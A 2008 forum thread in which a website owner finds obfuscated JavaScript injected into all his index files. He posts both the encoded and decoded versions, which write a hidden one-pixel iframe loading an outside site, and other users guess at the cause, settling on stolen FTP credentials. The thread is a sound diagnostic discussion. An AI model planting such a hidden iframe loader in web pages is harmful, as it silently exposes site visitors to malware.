JavaScript appeared on my site from nowhere!

Chardee MacDennis · 16-09-2008 8:38pm #1

a friend emailed me today saying IE was saying my site had a virus, so just checked out my code and found this

<script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,32,118,97,114,32,83,116,114,61,34,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,39,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,39,62,60,47,105,102,114,97,109,101,62,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,100,49,103,105,120,46,110,101,116,47,105,110,100,101,120,46,112,104,112,39,32,119,105,100,116,104,61,34,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,83,116,114,46,115,117,98,115,116,114,105,110,103,40,52,55,44,57,53,41,44,83,116,114,46,115,117,98,115,116,114,105,110,103,40,48,44,52,55,41,41,32,60,47,115,99,114,105,112,116,62));</script>

now i dont remember writing it and am not quote sure what it does. any clues what it is and how it got there?

Chardee MacDennis · 16-09-2008 8:43pm

seems to mean this

<script> var Str="1 height=1 style='visibility: hidden'></iframe><iframe src='http://d1gix.net/index.php' width="
document.write(Str.substring(47,95),Str.substring(0,47)) </script>

but how the f**k did it get there?

EDIT: it got all of my index.php and index.html files, grrr...

EKRIUQ · 16-09-2008 8:53pm

Mt guess is its a SQL injection that is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Chardee MacDennis · 16-09-2008 8:57pm

i dont understand, if it is an sql injection attack how is the JS turning up in the source code of all my index files, also i strip all user input before anything is done with it, will that not protect me in some way from these attacks...

EKRIUQ · 16-09-2008 8:59pm

Did you check your permisions on your index files, chmodd them to 644 which should make them unwritable on the server

Chardee MacDennis · 16-09-2008 9:02pm

Namesco wrote: »

Did you check your permisions on your index files, chmodd them to 644 which should make them unwritable on the server

they are all at 644...

EKRIUQ · 16-09-2008 9:03pm

I'm only guessing from experience but it's more likely the login, create account or contact us page where the attacks occur.

Here's a link which might help http://www.trap17.com/index.php/best-way-stop-sql-injections_t23083.html

none · 18-09-2008 9:56am

I think it's done over FTP, I mean, the files were simply replaced by the infected versions. Good thing to remember is the modification timestamp of your files so you can easily recognise if they were tampered with as in most cases copying over FTP sets the current timestamp. Basically, somebody got hold of your FTP login and password.

Chardee MacDennis · 18-09-2008 1:14pm

none wrote: »

I think it's done over FTP, I mean, the files were simply replaced by the infected versions. Good thing to remember is the modification timestamp of your files so you can easily recognise if they were tampered with as in most cases copying over FTP sets the current timestamp. Basically, somebody got hold of your FTP login and password.

yeh i've changed all my logins and it hasnt changed back to the infected version yet!

JavaScript appeared on my site from nowhere!

Comments